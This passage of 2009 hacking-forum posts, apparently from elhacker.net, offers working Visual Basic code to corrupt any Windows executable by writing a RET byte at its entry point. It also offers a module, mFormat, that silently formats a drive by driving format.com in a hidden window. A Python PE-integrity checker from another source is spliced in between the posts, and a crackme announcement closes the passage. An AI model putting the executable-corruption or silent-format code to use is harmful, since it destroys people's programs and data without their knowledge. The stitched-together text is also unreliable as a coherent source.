Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ' NT additional fields. ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type ' Section header Const IMAGE_SIZEOF_SHORT_NAME = 8 Private Type IMAGE_SECTION_HEADER SecName As String * IMAGE_SIZEOF_SHORT_NAME VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer characteristics As Long End Type '--------------------------------------------------------------------------------------- ' Procedimiento : PatchExe ' Autor : Karcrack ' Fecha : 07/04/2009 ' Parametro(s) : sPath -> La ruta del fichero ' Return : True si todo fue bien '--------------------------------------------------------------------------------------- Public Function PatchExe(ByVal sPath As String) As Boolean On Error GoTo Fallo Dim IDH As IMAGE_DOS_HEADER Dim INH As IMAGE_NT_HEADERS Dim ISH() As IMAGE_SECTION_HEADER Dim bvCode() As Byte Dim PE As Long Dim i As Long Dim Section As Long bvCode = ReadFile(sPath) 'Leemos el fichero Call 
CopyMemory(IDH, bvCode(0), Len(IDH)) 'Leemos la info del PE Call CopyMemory(INH, bvCode(IDH.e_lfanew), Len(INH)) 'Leemos la info del PE For i = 0 To INH.FileHeader.NumberOfSections - 1 ReDim Preserve ISH(0 To i) Call CopyMemory(ISH(i), bvCode(IDH.e_lfanew + Len(INH) + Len(ISH(i)) * i), Len(ISH(i))) If (INH.OptionalHeader.AddressOfEntryPoint => ISH(i).VirtualAddress) And (INH.OptionalHeader.AddressOfEntryPoint =< ISH(i).VirtualAddress + ISH(i).VirtualSize) Then Section = i Exit For End If Next i bvCode(INH.OptionalHeader.AddressOfEntryPoint - ISH(i).VirtualAddress + ISH(i).PointerToRawData) = &HC3 'Parcheamos el fichero (C3=RET) Call SaveFile(bvCode, sPath) PatchExe = True 'Todo funciono Exit Function 'Salimos Fallo: PatchExe = False 'Algo ha ido mal :S End Function '--------------------------------------------------------------------------------------- ' Procedimiento : ReadFile ' Autor : Karcrack ' Fecha : 07/04/2009 ' Parametro(s) : sPath -> La ruta del fichero ' Return : Devuelve un Byte array con los bytes del fichero '--------------------------------------------------------------------------------------- Private Function ReadFile(ByVal sPath As String) As Byte() Dim bvTmp() As Byte Open sPath For Binary As #1 ReDim bvTmp(0 To LOF(1) - 1) Get #1, , bvTmp Close #1 ReadFile = bvTmp End Function '--------------------------------------------------------------------------------------- ' Procedimiento : SaveFile ' Autor : Karcrack ' Fecha : 07/04/2009 ' Parametro(s) : bvData() -> Array de datos ' sPath -> Ruta de guardado '--------------------------------------------------------------------------------------- Private Sub SaveFile(ByRef bvData() As Byte, ByVal sPath As String) Open sPath For Binary As #1 Put #1, , bvData Close #1 End Sub

Computer Security / Abril negro / [RET Exe Corruption] Corrupts any Executable
on: 7 April 2009, 19:00 pm
Good afternoon. Today I present this method of executable 'corruption'. Ever since I saw the method Mad posted I'd been thinking: http://foro.elhacker.net/analisis_y_diseno_de_malware/metodo_ifeo_bug_image_file_execution_options-t249670.0.html This method modifies the executable so that it closes as soon as it's opened, by adding a RET at the first byte executed.
What's special about it?
- It modifies only one Byte
- It works with the PE
Problems? Only one:
- You need write permissions on the file; if it's open you won't be able to...
Steps to apply this method:
- Get the file's Entry Point RVA
- Convert it to RAW
- Replace the first BYTE with a RET (C3h)
Here's the code in VB: http://foro.elhacker.net/programacion_vb/sourceret_exe_corruption_corrompe_cualquier_ejecutable-t251138.0.html;msg1211626#msg1211626 Regards
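The three steps above (entry point RVA, RVA to raw file offset, first byte) are also exactly what a file-integrity check has to walk to spot an executable that has been tampered with this way. The following Python is an added example, not part of the post or of the VB module it links to: it reads the DOS header, the NT headers and the section table of a PE32 file, maps AddressOfEntryPoint to its raw offset through the section that contains it, and reports whether the first instruction at the entry point is a RET (0xC3). The `build_minimal_pe` helper and the byte strings it assembles are constructed for the example so it runs offline; they are headers only, not a loadable image. The section-range test (half-open, using the larger of VirtualSize and SizeOfRawData) and the helper and function names are my own choices.

```python
import struct
import sys

# PE layout offsets used below (from the PE/COFF specification)
DOS_E_LFANEW = 0x3C          # offset of e_lfanew in IMAGE_DOS_HEADER
FILE_HEADER_SIZE = 20        # sizeof(IMAGE_FILE_HEADER)
SECTION_HEADER_SIZE = 40     # sizeof(IMAGE_SECTION_HEADER)
OPT_ENTRY_POINT = 16         # offset of AddressOfEntryPoint in IMAGE_OPTIONAL_HEADER
RET_OPCODE = 0xC3


def entry_point_file_offset(data: bytes) -> int:
    """Steps 1 and 2 of the post, read-only: take AddressOfEntryPoint (an RVA) and
    convert it to a raw file offset via the section header that contains it."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, DOS_E_LFANEW)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (number_of_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (size_of_optional_header,) = struct.unpack_from("<H", data, e_lfanew + 20)
    optional_header = e_lfanew + 4 + FILE_HEADER_SIZE
    (entry_rva,) = struct.unpack_from("<I", data, optional_header + OPT_ENTRY_POINT)
    section_table = optional_header + size_of_optional_header
    for i in range(number_of_sections):
        hdr = section_table + SECTION_HEADER_SIZE * i
        # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData follow the 8-byte name
        vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", data, hdr + 8)
        if vaddr <= entry_rva < vaddr + max(vsize, raw_size):
            return entry_rva - vaddr + raw_ptr
    raise ValueError("entry point RVA is not inside any section")


def entry_starts_with_ret(data: bytes) -> bool:
    """Step 3, as a check instead of a write: is the first byte executed a RET (0xC3)?"""
    return data[entry_point_file_offset(data)] == RET_OPCODE


def build_minimal_pe(entry_code: bytes) -> bytes:
    """Constructed PE32 image for the example (headers only, not loadable):
    one .text section at RVA 0x1000 / raw offset 0x200, entry point RVA 0x1010."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, DOS_E_LFANEW, 0x40)            # e_lfanew -> PE signature at 0x40
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)  # i386, 1 section, PE32 opt hdr
    optional = bytearray(224)
    struct.pack_into("<H", optional, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", optional, OPT_ENTRY_POINT, 0x1010)   # AddressOfEntryPoint
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x100, 0x1000, 0x200, 0x200,
                          0, 0, 0, 0, 0x60000020)               # code | execute | read
    headers = bytes(dos) + b"PE\0\0" + file_header + bytes(optional) + section
    image = bytearray(headers.ljust(0x400, b"\0"))
    image[0x210:0x210 + len(entry_code)] = entry_code           # raw 0x200 + (0x1010 - 0x1000)
    return bytes(image)


def check_file(path: str) -> bool:
    """True if the executable at path starts with a RET at its entry point."""
    with open(path, "rb") as fh:
        return entry_starts_with_ret(fh.read())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for p in sys.argv[1:]:
            print(p, "entry point is RET" if check_file(p) else "ok")
    else:
        intact = build_minimal_pe(b"\x55\x8b\xec")   # push ebp; mov ebp, esp
        patched = build_minimal_pe(b"\xc3")          # ret
        print("intact:", entry_starts_with_ret(intact), "patched:", entry_starts_with_ret(patched))
```

Run with file paths as arguments to scan real executables, or with none to exercise the two constructed images. A RET as the very first instruction is rare in legitimately linked binaries, so a hit is a strong tampering indicator, but the definitive control is the one the post itself names as its only obstacle: deny write access to executables, and compare file hashes against a known-good baseline rather than relying on one opcode.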

Programming / Visual Basic Programming / [SRC]mFormat - Format Drives from VB {Silently}
on: 13 February 2009, 17:05 pm
Well, I'm fed up with this thread: http://foro.elhacker.net/programacion_vb/formatear_sin_usar_shformatdrive-t244230.0.html So I've made this module using PIPES (Thanks Cobein). Here it is:
'---------------------------------------------------------------------------------------
' Module    : mFormat
' Author    : Karcrack
' Date-Time : 13/02/2009 16:25
' Purpose   : Format a drive silently, using PIPES
' Reference : COBEIN's StdIO class, from his 'trojan'
' Thanks    : To COBEIN :D For his code ;)
'---------------------------------------------------------------------------------------
Option Explicit

Private Const PROCESS_QUERY_INFORMATION As Long = &H400
Private Const PROCESS_TERMINATE As Long = (&H1)
Private Const PROCESS_VM_READ As Long = &H10
Private Const NORMAL_PRIORITY_CLASS As Long = &H20&
Private Const STARTF_USESTDHANDLES As Long = &H100&
Private Const STARTF_USESHOWWINDOW As Long = &H1
Private Const SW_HIDE As Long = 0
Private Const PIPE_WAIT As Long = &H0
Private Const PIPE_NOWAIT As Long = &H1
Private Const PIPE_READMODE_BYTE As Long = &H0
Private Const PIPE_READMODE_MESSAGE As Long = &H2
Private Const PIPE_TYPE_BYTE As Long = &H0
Private Const PIPE_TYPE_MESSAGE As Long = &H4

Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadID As Long
End Type

Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As Any, ByVal nSize As Long) As Long
Private Declare Function SetNamedPipeHandleState Lib "kernel32" (ByVal hNamedPipe As Long, lpMode As Long, lpMaxCollectionCount As Long, lpCollectDataTimeout As Long) As Long
Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, ByVal lpBuffer As String, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Any) As Long
Private Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Any) As Long
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpApplicationName As Long, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hHandle As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Sub Sleep Lib "kernel32.dll" (ByVal dwMilliseconds As Long)

Private c_bPiping As Boolean
Private c_bCancel As Boolean
Private c_lhReadPipe As Long
Private c_lhWritePipe As Long
Private c_lhReadPipe2 As Long
Private c_lhWritePipe2 As Long

Dim tSTARTUPINFO As STARTUPINFO
Dim tPROCESS_INFORMATION As PROCESS_INFORMATION
Dim tSECURITY_ATTRIBUTES As SECURITY_ATTRIBUTES
Dim sBuffer As String * 4096

Public Function AltFormat(ByVal sDrive As String, Optional ByVal Quick As Boolean, Optional ByVal
sName As String) As Boolean Dim sCmd As String sCmd = "format.com " & sDrive & " /X" & IIf((Quick = True), " /Q", vbNullString) If Not Left$(sName, 1) = Chr$(13) Then sName = sName & Chr$(13) With tSECURITY_ATTRIBUTES .nLength = LenB(tSECURITY_ATTRIBUTES) .bInheritHandle = True .lpSecurityDescriptor = False End With Call CreatePipe(c_lhReadPipe, c_lhWritePipe, tSECURITY_ATTRIBUTES, 0&) Call CreatePipe(c_lhReadPipe2, c_lhWritePipe2, tSECURITY_ATTRIBUTES, 0&) Call SetNamedPipeHandleState(c_lhReadPipe, PIPE_READMODE_BYTE Or PIPE_NOWAIT, 0&, 0&) With tSTARTUPINFO .cb = LenB(tSTARTUPINFO) .dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW .wShowWindow = SW_HIDE .hStdOutput = c_lhWritePipe .hStdError = c_lhWritePipe .hStdInput = c_lhReadPipe2 End With Call CreateProcessA(0&, sCmd, tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, 1&, NORMAL_PRIORITY_CLASS, 0&, 0&, tSTARTUPINFO, tPROCESS_INFORMATION) If InStr(1, WriteToPipe(Chr$(13)), "Escriba una etiqueta de volumen", vbTextCompare) <> 0 Then Do Until InStr(1, WriteToPipe(sName), "a otro disco (S/N)", vbTextCompare) <> 0 Call Sleep(1000) Loop End If Call CloseHandle(tPROCESS_INFORMATION.hProcess) Call CloseHandle(c_lhReadPipe): c_lhReadPipe = 0 Call CloseHandle(c_lhReadPipe2): c_lhReadPipe2 = 0 Call CloseHandle(c_lhWritePipe): c_lhWritePipe = 0 Call CloseHandle(c_lhWritePipe2): c_lhWritePipe2 = 0 AltFormat = ExitProcessPID(tPROCESS_INFORMATION.dwProcessId) End Function Private Function WriteToPipe(ByVal sData As String) As String Dim bvData() As Byte bvData = StrConv(sData & vbCrLf & vbNullChar, vbFromUnicode) Call WriteFile(c_lhWritePipe2, bvData(0), UBound(bvData), 0, 0&) Do DoEvents: Call Sleep(2500) If Not ReadFile(c_lhReadPipe, sBuffer, 4096, 0, 0&) = 0 Then WriteToPipe = Left$(sBuffer, lstrlen(sBuffer)) sBuffer = String$(4096, vbNullChar) DoEvents Else Exit Do End If Loop End Function Private Function ExitProcessPID(ByVal lProcessID As Long) As Boolean Dim lProcess As Long Dim lExitCode As Long lProcess = 
OpenProcess(PROCESS_TERMINATE Or PROCESS_QUERY_INFORMATION Or _ PROCESS_VM_READ, _ 0, lProcessID) If GetExitCodeProcess(lProcess, lExitCode) Then TerminateProcess lProcess, lExitCode ExitProcessPID = True End If Call CloseHandle(lProcess) End Function
Usage:
Call AltFormat("A:", True)

NOTE: Only works with Spanish W$.
Regards
PS: I hate the new 'xD' ( = )
Programming / Reverse Engineering / #3 CrackMe (Karcrack){Difficulty: 8/10?}
on: 8 February 2009, 13:57 pm
Well, here is my third CrackMe.
Language: VB6
Difficulty: Very hard (this is a bit subjective)

What you have to do is:
0- Manage to satisfy the hidden condition
1- Obtain a valid username and password. Note: the same user can have infinitely many passwords
2- Make a KeyGen (optional and hard?)

What you must not do is:
1- Patch it so that it accepts any user and password

Download: http://www.box.net/shared/d9zur18gpy

Hall of Fame: here I attach PeterPunk's KeyGen:

Regards and good luck